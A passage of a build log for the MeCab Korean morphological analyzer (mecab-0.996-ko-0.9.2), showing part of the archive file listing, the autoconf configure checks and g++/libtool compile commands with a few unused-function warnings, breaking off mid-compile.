ko-0.9.2/doc/doxygen/classMeCab_1_1Lattice-members.html\nmecab-0.996-ko-0.9.2/doc/doxygen/structmecab__node__t.html\nmecab-0.996-ko-0.9.2/doc/doxygen/namespacemembers_func.html\nmecab-0.996-ko-0.9.2/doc/doxygen/tab_s.png\nmecab-0.996-ko-0.9.2/doc/doxygen/structmecab__dictionary__info__t-members.html\nmecab-0.996-ko-0.9.2/doc/doxygen/namespacemembers_type.html\nmecab-0.996-ko-0.9.2/doc/doxygen/classMeCab_1_1Model-members.html\nmecab-0.996-ko-0.9.2/doc/doxygen/structmecab__dictionary__info__t.html\nmecab-0.996-ko-0.9.2/doc/doxygen/namespaces.html\nmecab-0.996-ko-0.9.2/doc/doxygen/namespacemembers.html\nmecab-0.996-ko-0.9.2/doc/doxygen/namespaceMeCab.html\nmecab-0.996-ko-0.9.2/doc/doxygen/structmecab__path__t.html\nmecab-0.996-ko-0.9.2/doc/doxygen/files.html\nmecab-0.996-ko-0.9.2/doc/doxygen/structmecab__node__t-members.html\nmecab-0.996-ko-0.9.2/doc/doxygen/index.html\nmecab-0.996-ko-0.9.2/doc/doxygen/annotated.html\nmecab-0.996-ko-0.9.2/doc/doxygen/globals_defs.html\nmecab-0.996-ko-0.9.2/doc/doxygen/classes.html\nmecab-0.996-ko-0.9.2/doc/doxygen/mecab_8h-source.html\nmecab-0.996-ko-0.9.2/doc/doxygen/doxygen.png\nmecab-0.996-ko-0.9.2/doc/doxygen/tab_b.gif\nmecab-0.996-ko-0.9.2/doc/doxygen/bc_s.png\nmecab-0.996-ko-0.9.2/doc/doxygen/open.png\nmecab-0.996-ko-0.9.2/doc/doxygen/mecab_8h.html\nmecab-0.996-ko-0.9.2/doc/dic.html\nmecab-0.996-ko-0.9.2/doc/partial.html\nmecab-0.996-ko-0.9.2/doc/feature.png\nmecab-0.996-ko-0.9.2/doc/Makefile.in\nmecab-0.996-ko-0.9.2/missing\nmecab-0.996-ko-0.9.2/BSD\nmecab-0.996-ko-0.9.2/NEWS\nmecab-0.996-ko-0.9.2/mkinstalldirs\nmecab-0.996-ko-0.9.2/src/\nmecab-0.996-ko-0.9.2/src/dictionary.h\nmecab-0.996-ko-0.9.2/src/writer.h\nmecab-0.996-ko-0.9.2/src/utils.h\nmecab-0.996-ko-0.9.2/src/string_buffer.cpp\nmecab-0.996-ko-0.9.2/src/tokenizer.cpp\nmecab-0.996-ko-0.9.2/src/make.bat\nmecab-0.996-ko-0.9.2/src/mecab.h\nmecab-0.996-ko-0.9.2/src/freelist.h\nmecab-0.996-ko-0.9.2/src/string_buffer.h\nmecab-0.996-ko-0.9.2/src/learner_tagger.h\nmecab-0.996-ko-0.9.2/src/dictionary_compiler.cpp\nmecab-0.996-ko-0.9.2/src/eval.cpp\nmecab-0.996-ko-0.9.2/src/mecab-system-eval.cpp\nmecab-0.996-ko-0.9.2/src/darts.h\nmecab-0.996-ko-0.9.2/src/param.h\nmecab-0.996-ko-0.9.2/src/char_property.h\nmecab-0.996-ko-0.9.2/src/learner_node.h\nmecab-0.996-ko-0.9.2/src/mecab-dict-gen.cpp\nmecab-0.996-ko-0.9.2/src/mecab-dict-index.cpp\nmecab-0.996-ko-0.9.2/src/winmain.h\nmecab-0.996-ko-0.9.2/src/thread.h\nmecab-0.996-ko-0.9.2/src/context_id.cpp\nmecab-0.996-ko-0.9.2/src/Makefile.am\nmecab-0.996-ko-0.9.2/src/connector.h\nmecab-0.996-ko-0.9.2/src/common.h\nmecab-0.996-ko-0.9.2/src/dictionary_rewriter.cpp\nmecab-0.996-ko-0.9.2/src/Makefile.msvc.in\nmecab-0.996-ko-0.9.2/src/dictionary_rewriter.h\nmecab-0.996-ko-0.9.2/src/feature_index.h\nmecab-0.996-ko-0.9.2/src/iconv_utils.cpp\nmecab-0.996-ko-0.9.2/src/char_property.cpp\nmecab-0.996-ko-0.9.2/src/mecab-test-gen.cpp\nmecab-0.996-ko-0.9.2/src/tagger.cpp\nmecab-0.996-ko-0.9.2/src/mecab-cost-train.cpp\nmecab-0.996-ko-0.9.2/src/learner.cpp\nmecab-0.996-ko-0.9.2/src/dictionary.cpp\nmecab-0.996-ko-0.9.2/src/lbfgs.cpp\nmecab-0.996-ko-0.9.2/src/ucs.h\nmecab-0.996-ko-0.9.2/src/writer.cpp\nmecab-0.996-ko-0.9.2/src/learner_tagger.cpp\nmecab-0.996-ko-0.9.2/src/lbfgs.h\nmecab-0.996-ko-0.9.2/src/libmecab.cpp\nmecab-0.996-ko-0.9.2/src/tokenizer.h\nmecab-0.996-ko-0.9.2/src/mecab.cpp\nmecab-0.996-ko-0.9.2/src/utils.cpp\nmecab-0.996-ko-0.9.2/src/dictionary_generator.cpp\nmecab-0.996-ko-0.9.2/src/param.cpp\nmecab-0.996-ko-0.9.2/src/context_id.h\nmecab-0.996-ko-0.9.2/src/mmap.h\nmecab-0.996-ko-0.9.2/src/viterbi.h\nmecab-0.996-ko-0.9.2/src/viterbi.cpp\nmecab-0.996-ko-0.9.2/src/stream_wrapper.h\nmecab-0.996-ko-0.9.2/src/feature_index.cpp\nmecab-0.996-ko-0.9.2/src/nbest_generator.h\nmecab-0.996-ko-0.9.2/src/ucstable.h\nmecab-0.996-ko-0.9.2/src/nbest_generator.cpp\nmecab-0.996-ko-0.9.2/src/iconv_utils.h\nmecab-0.996-ko-0.9.2/src/connector.cpp\nmecab-0.996-ko-0.9.2/src/Makefile.in\nmecab-0.996-ko-0.9.2/src/scoped_ptr.h\nmecab-0.996-ko-0.9.2/Makefile.in\nchecking for a BSD-compatible install... /usr/bin/install -c\nchecking whether build environment is sane... yes\nchecking for a thread-safe mkdir -p... /bin/mkdir -p\nchecking for gawk... no\nchecking for mawk... mawk\nchecking whether make sets $(MAKE)... yes\nchecking for gcc... gcc\nchecking whether the C compiler works... yes\nchecking for C compiler default output file name... a.out\nchecking for suffix of executables... \nchecking whether we are cross compiling... no\nchecking for suffix of object files... o\nchecking whether we are using the GNU C compiler... yes\nchecking whether gcc accepts -g... yes\nchecking for gcc option to accept ISO C89... none needed\nchecking for style of include used by make... GNU\nchecking dependency style of gcc... none\nchecking for g++... g++\nchecking whether we are using the GNU C++ compiler... yes\nchecking whether g++ accepts -g... yes\nchecking dependency style of g++... none\nchecking how to run the C preprocessor... gcc -E\nchecking for grep that handles long lines and -e... /bin/grep\nchecking for egrep... /bin/grep -E\nchecking whether gcc needs -traditional... no\nchecking whether make sets $(MAKE)... (cached) yes\nchecking build system type... x86_64-unknown-linux-gnu\nchecking host system type... x86_64-unknown-linux-gnu\nchecking how to print strings... printf\nchecking for a sed that does not truncate output... /bin/sed\nchecking for fgrep... /bin/grep -F\nchecking for ld used by gcc... /usr/bin/ld\nchecking if the linker (/usr/bin/ld) is GNU ld... yes\nchecking for BSD- or MS-compatible name lister (nm)... /usr/bin/nm -B\nchecking the name lister (/usr/bin/nm -B) interface... BSD nm\nchecking whether ln -s works... yes\nchecking the maximum length of command line arguments... 1572864\nchecking whether the shell understands some XSI constructs... yes\nchecking whether the shell understands \"+=\"... yes\nchecking how to convert x86_64-unknown-linux-gnu file names to x86_64-unknown-linux-gnu format... func_convert_file_noop\nchecking how to convert x86_64-unknown-linux-gnu file names to toolchain format... func_convert_file_noop\nchecking for /usr/bin/ld option to reload object files... -r\nchecking for objdump... objdump\nchecking how to recognize dependent libraries... pass_all\nchecking for dlltool... dlltool\nchecking how to associate runtime and link libraries... printf %s\\n\nchecking for ar... ar\nchecking for archiver @FILE support... @\nchecking for strip... strip\nchecking for ranlib... ranlib\nchecking command to parse /usr/bin/nm -B output from gcc object... ok\nchecking for sysroot... no\n./configure: line 7378: /usr/bin/file: No such file or directory\nchecking for mt... no\nchecking if : is a manifest tool... no\nchecking for ANSI C header files... yes\nchecking for sys/types.h... yes\nchecking for sys/stat.h... yes\nchecking for stdlib.h... yes\nchecking for string.h... yes\nchecking for memory.h... yes\nchecking for strings.h... yes\nchecking for inttypes.h... yes\nchecking for stdint.h... yes\nchecking for unistd.h... yes\nchecking for dlfcn.h... yes\nchecking for objdir... .libs\nchecking if gcc supports -fno-rtti -fno-exceptions... no\nchecking for gcc option to produce PIC... -fPIC -DPIC\nchecking if gcc PIC flag -fPIC -DPIC works... yes\nchecking if gcc static flag -static works... yes\nchecking if gcc supports -c -o file.o... yes\nchecking if gcc supports -c -o file.o... (cached) yes\nchecking whether the gcc linker (/usr/bin/ld) supports shared libraries... yes\nchecking whether -lc should be explicitly linked in... no\nchecking dynamic linker characteristics... GNU/Linux ld.so\nchecking how to hardcode library paths into programs... immediate\nchecking whether stripping libraries is possible... yes\nchecking if libtool supports shared libraries... yes\nchecking whether to build shared libraries... yes\nchecking whether to build static libraries... yes\nchecking how to run the C++ preprocessor... g++ -E\nchecking for ld used by g++... /usr/bin/ld\nchecking if the linker (/usr/bin/ld) is GNU ld... yes\nchecking whether the g++ linker (/usr/bin/ld) supports shared libraries... yes\nchecking for g++ option to produce PIC... -fPIC -DPIC\nchecking if g++ PIC flag -fPIC -DPIC works... yes\nchecking if g++ static flag -static works... yes\nchecking if g++ supports -c -o file.o... yes\nchecking if g++ supports -c -o file.o... (cached) yes\nchecking whether the g++ linker (/usr/bin/ld) supports shared libraries... yes\nchecking dynamic linker characteristics... (cached) GNU/Linux ld.so\nchecking how to hardcode library paths into programs... immediate\nchecking for library containing strerror... none required\nchecking whether byte ordering is bigendian... no\nchecking for ld used by GCC... /usr/bin/ld\nchecking if the linker (/usr/bin/ld) is GNU ld... yes\nchecking for shared library run path origin... done\nchecking for iconv... yes\nchecking for working iconv... yes\nchecking for iconv declaration... \n extern size_t iconv (iconv_t cd, char * *inbuf, size_t *inbytesleft, char * *outbuf, size_t *outbytesleft);\nchecking for ANSI C header files... (cached) yes\nchecking for an ANSI C-conforming const... yes\nchecking whether byte ordering is bigendian... (cached) no\nchecking for string.h... (cached) yes\nchecking for stdlib.h... (cached) yes\nchecking for unistd.h... (cached) yes\nchecking fcntl.h usability... yes\nchecking fcntl.h presence... yes\nchecking for fcntl.h... yes\nchecking for stdint.h... (cached) yes\nchecking for sys/stat.h... (cached) yes\nchecking sys/mman.h usability... yes\nchecking sys/mman.h presence... yes\nchecking for sys/mman.h... yes\nchecking sys/times.h usability... yes\nchecking sys/times.h presence... yes\nchecking for sys/times.h... yes\nchecking for sys/types.h... (cached) yes\nchecking dirent.h usability... yes\nchecking dirent.h presence... yes\nchecking for dirent.h... yes\nchecking ctype.h usability... yes\nchecking ctype.h presence... yes\nchecking for ctype.h... yes\nchecking for sys/types.h... (cached) yes\nchecking io.h usability... no\nchecking io.h presence... no\nchecking for io.h... no\nchecking windows.h usability... no\nchecking windows.h presence... no\nchecking for windows.h... no\nchecking pthread.h usability... yes\nchecking pthread.h presence... yes\nchecking for pthread.h... yes\nchecking for off_t... yes\nchecking for size_t... yes\nchecking size of char... 1\nchecking size of short... 2\nchecking size of int... 4\nchecking size of long... 8\nchecking size of long long... 8\nchecking size of size_t... 8\nchecking for size_t... (cached) yes\nchecking for unsigned long long int... yes\nchecking for stdlib.h... (cached) yes\nchecking for unistd.h... (cached) yes\nchecking for sys/param.h... yes\nchecking for getpagesize... yes\nchecking for working mmap... yes\nchecking for main in -lstdc++... yes\nchecking for pthread_create in -lpthread... yes\nchecking for pthread_join in -lpthread... yes\nchecking for getenv... yes\nchecking for opendir... yes\nchecking whether make is GNU Make... yes\nchecking if g++ supports stl <vector> (required)... yes\nchecking if g++ supports stl <list> (required)... yes\nchecking if g++ supports stl <map> (required)... yes\nchecking if g++ supports stl <set> (required)... yes\nchecking if g++ supports stl <queue> (required)... yes\nchecking if g++ supports stl <functional> (required)... yes\nchecking if g++ supports stl <algorithm> (required)... yes\nchecking if g++ supports stl <string> (required)... yes\nchecking if g++ supports stl <iostream> (required)... yes\nchecking if g++ supports stl <sstream> (required)... yes\nchecking if g++ supports stl <fstream> (required)... yes\nchecking if g++ supports template <class T> (required)... yes\nchecking if g++ supports const_cast<> (required)... yes\nchecking if g++ supports static_cast<> (required)... yes\nchecking if g++ supports reinterpret_cast<> (required)... yes\nchecking if g++ supports namespaces (required) ... yes\nchecking if g++ supports __thread (optional)... yes\nchecking if g++ supports template <class T> (required)... yes\nchecking if g++ supports GCC native atomic operations (optional)... yes\nchecking if g++ supports OSX native atomic operations (optional)... no\nchecking if g++ environment provides all required features... yes\nconfigure: creating ./config.status\nconfig.status: creating Makefile\nconfig.status: creating src/Makefile\nconfig.status: creating src/Makefile.msvc\nconfig.status: creating man/Makefile\nconfig.status: creating doc/Makefile\nconfig.status: creating tests/Makefile\nconfig.status: creating swig/version.h\nconfig.status: creating mecab.iss\nconfig.status: creating mecab-config\nconfig.status: creating mecabrc\nconfig.status: creating config.h\nconfig.status: executing depfiles commands\nconfig.status: executing libtool commands\nconfig.status: executing default commands\nmake all-recursive\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2'\nMaking all in src\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/src'\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o viterbi.lo viterbi.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c viterbi.cpp -fPIC -DPIC -o .libs/viterbi.o\nIn file included from \u001b[01m\u001b[Kviterbi.cpp:14:0\u001b[m\u001b[K:\n\u001b[01m\u001b[Kparam.h:30:13:\u001b[m\u001b[K \u001b[01;35m\u001b[Kwarning: \u001b[m\u001b[K'\u001b[01m\u001b[KTarget {anonymous}::lexical_cast(Source) [with Target = std::__cxx11::basic_string<char>; Source = std::__cxx11::basic_string<char>]\u001b[m\u001b[K' defined but not used [\u001b[01;35m\u001b[K-Wunused-function\u001b[m\u001b[K]\n std::string \u001b[01;35m\u001b[Klexical_cast<std::string, std::string>\u001b[m\u001b[K(std::string arg) {\n \u001b[01;35m\u001b[K^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\u001b[m\u001b[K\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c viterbi.cpp -o viterbi.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o tagger.lo tagger.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c tagger.cpp -fPIC -DPIC -o .libs/tagger.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c tagger.cpp -o tagger.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o utils.lo utils.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c utils.cpp -fPIC -DPIC -o .libs/utils.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c utils.cpp -o utils.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o eval.lo eval.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c eval.cpp -fPIC -DPIC -o .libs/eval.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c eval.cpp -o eval.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o iconv_utils.lo iconv_utils.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c iconv_utils.cpp -fPIC -DPIC -o .libs/iconv_utils.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c iconv_utils.cpp -o iconv_utils.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o dictionary_rewriter.lo dictionary_rewriter.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary_rewriter.cpp -fPIC -DPIC -o .libs/dictionary_rewriter.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary_rewriter.cpp -o dictionary_rewriter.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o dictionary_generator.lo dictionary_generator.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary_generator.cpp -fPIC -DPIC -o .libs/dictionary_generator.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary_generator.cpp -o dictionary_generator.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o dictionary_compiler.lo dictionary_compiler.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary_compiler.cpp -fPIC -DPIC -o .libs/dictionary_compiler.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary_compiler.cpp -o dictionary_compiler.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o context_id.lo context_id.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c context_id.cpp -fPIC -DPIC -o .libs/context_id.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c context_id.cpp -o context_id.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o connector.lo connector.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c connector.cpp -fPIC -DPIC -o .libs/connector.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c connector.cpp -o connector.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o nbest_generator.lo nbest_generator.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c nbest_generator.cpp -fPIC -DPIC -o .libs/nbest_generator.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c nbest_generator.cpp -o nbest_generator.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o writer.lo writer.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c writer.cpp -fPIC -DPIC -o .libs/writer.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c writer.cpp -o writer.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o string_buffer.lo string_buffer.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c string_buffer.cpp -fPIC -DPIC -o .libs/string_buffer.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c string_buffer.cpp -o string_buffer.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o param.lo param.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c param.cpp -fPIC -DPIC -o .libs/param.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c param.cpp -o param.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o tokenizer.lo tokenizer.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c tokenizer.cpp -fPIC -DPIC -o .libs/tokenizer.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c tokenizer.cpp -o tokenizer.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o char_property.lo char_property.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c char_property.cpp -fPIC -DPIC -o .libs/char_property.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c char_property.cpp -o char_property.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o dictionary.lo dictionary.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary.cpp -fPIC -DPIC -o .libs/dictionary.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c dictionary.cpp -o dictionary.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o feature_index.lo feature_index.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c feature_index.cpp -fPIC -DPIC -o .libs/feature_index.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c feature_index.cpp -o feature_index.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o lbfgs.lo lbfgs.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c lbfgs.cpp -fPIC -DPIC -o .libs/lbfgs.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c lbfgs.cpp -o lbfgs.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o learner_tagger.lo learner_tagger.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c learner_tagger.cpp -fPIC -DPIC -o .libs/learner_tagger.o\n\u001b[01m\u001b[Klearner_tagger.cpp:25:7:\u001b[m\u001b[K \u001b[01;35m\u001b[Kwarning: \u001b[m\u001b[K'\u001b[01m\u001b[Kchar* MeCab::{anonymous}::mystrdup(const string&)\u001b[m\u001b[K' defined but not used [\u001b[01;35m\u001b[K-Wunused-function\u001b[m\u001b[K]\n char *\u001b[01;35m\u001b[Kmystrdup\u001b[m\u001b[K(const std::string &str) {\n \u001b[01;35m\u001b[K^~~~~~~~\u001b[m\u001b[K\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c learner_tagger.cpp -o learner_tagger.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o learner.lo learner.cpp\nlibtool: compile: g++ 